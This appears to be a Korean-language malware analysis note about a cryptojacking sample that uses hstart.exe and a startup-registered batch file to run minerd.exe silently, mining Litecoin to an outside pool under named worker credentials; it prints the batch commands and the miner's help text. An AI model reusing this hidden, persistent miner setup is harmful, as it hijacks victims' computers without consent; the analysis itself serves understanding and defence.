About Bitcoin

온라인 화폐 종류

1. Bitcoin

2. Litecoin

3. Peercoin

4. Namecoin

등 위 URL에 등록되어 있는 List만 53개

해당 전자 화폐의 경우 

ltc3.exe

4개의 dll

2개의 bat

2개의 exe 파일로 구성

hstart.exe : 윈도우 창을 띄우지 않고 백그라운드로 실행 시켜주는 유틸리티

             서비스 실행 모드를 제공하지 않는 어플리케이션의 경우 

cmd 창에서 명령어를 쳐서 실행한다.

계속 켜둘 경우 사용자에게 거슬리거나 악성 행위를 하는 프로그램이면

노출되기 때문에 백그라운드로 실행 시킬 수 있도록 한다.

 

ssl.bat 

 - hstart /NOCONSOLE "2.bat" 내용이 적혀 있따.

   2.bat 파일을 백그라운드로 실행 시킬 수 있도록 유도 한다.

   이 bat 파일은 시작 프로그램에 등록되어 시스템 재시작시에도 채굴될 수 있도록 유도

   

2.bat 

 - 내용 : minerd.exe --url stratum+tcp://mine.pool-x.eu:9000 --threads=3 --userpass=anna1113.3:1234567

   minerd.exe 채굴 프로그램을 이용해서 stratum+tcp://mine.pool-x.eu:9000 pool로 쓰레드 3개를 생성하여 

   id가 anna1113.3, pwd가 1234567 을 가진 계정에 보내게 된다. 

   

프로세스 모니터를 통해 확인해보면, minerd.exe의 cpu 사용률이 100%에 육박한 것을 확인할 수 있다.

minerd.exe가 실행 시에 위에 이야기했듯이 아래와 같은 인자 값을 설정 후에 실행을 하게 된다.

 --url stratum+tcp://mine.pool-x.eu:9000 --threads=3 --userpass=anna1113.3:1234567

 

https://livechains.net/www/miner-help

Poolers minerd CPU Miner

 - minerd는 아마도 CPU miner 중에 최고일 것이고, 매일 매시간 컴퓨터에 아주 쉽게 구동해줄 수 있는 CPU miner 이다.

   minerd.exe --url stratum+tcp://somepool.somewebsite.com --userpass Username.Workername:Password

   형식으로 구동 시킬 수 있다. 당신이 사용하고 있는 계정 정보와 명확한 Pool 정보를 설정 해야 한다.

   

  minerd.exe에 의해 사용되는 옵션은 아래와 같다.

  C:\Documents and Settings\Administrator\바탕 화면\ltc3>minerd.exe --help

Usage: minerd [OPTIONS]

Options:

 -a, --algo=ALGO       specify the algorithm to use

 scrypt    scrypt(1024, 1, 1) (default)

 sha256d   SHA-256d

 -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)

 -O, --userpass=U:P    username:password pair for mining server

 -u, --user=USERNAME   username for mining server

 -p, --pass=PASSWORD   password for mining server

 --cert=FILE       certificate for mining server using SSL

 -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy

 -t, --threads=N       number of miner threads (default: number of processors)

 -r, --retries=N       number of times to retry if a network call fails

 (default: retry indefinitely)

 -R, --retry-pause=N   time to pause between retries, in seconds (default: 30)

 -T, --timeout=N       network timeout, in seconds (default: 270)

 -s, --scantime=N      upper bound on time spent scanning current work when

 long polling is unavailable, in seconds (default: 5)

 --no-longpoll     disable X-Long-Polling support

 --no-stratum      disable X-Stratum support

 -q, --quiet           disable per-thread hashmeter output

 -D, --debug           enable debug output

 -P, --protocol-dump   verbose dump of protocol-level activities

 --benchmark       run in offline benchmark mode

 -c, --config=FILE     load a JSON-format configuration file

 -V, --version         display version information and exit

 -h, --help            display this help text and exit

결국 해당 악성코드는 

stratum+tcp://mine.pool-x.eu:9000 url (마이닝 풀) 로

감염 PC의 cpu를 이용하여 코인을 채굴하고 있음

주요 마이닝 Pool 그룹 : http://bitcoinchain.com/pools#start=1358348460&end=1387378740

전자 화폐 순위 : http://coinmarketcap.com/

시세 : https://vircurex.com/

라이트코인 채굴 : http://ireland08.tistory.com/231, http://cluster1.cafe.daum.net/_c21_/bbs_search_read?grpid=1S1up&fldid=Oubw&contentval=0000500006zzzzzzzzzzzzzzzzzzzz&nenc=&fenc=&q=&nil_profile=cafetop&nil_menu=sch_updw

비트코인 채굴 : http://cezacx2.tistory.com/1048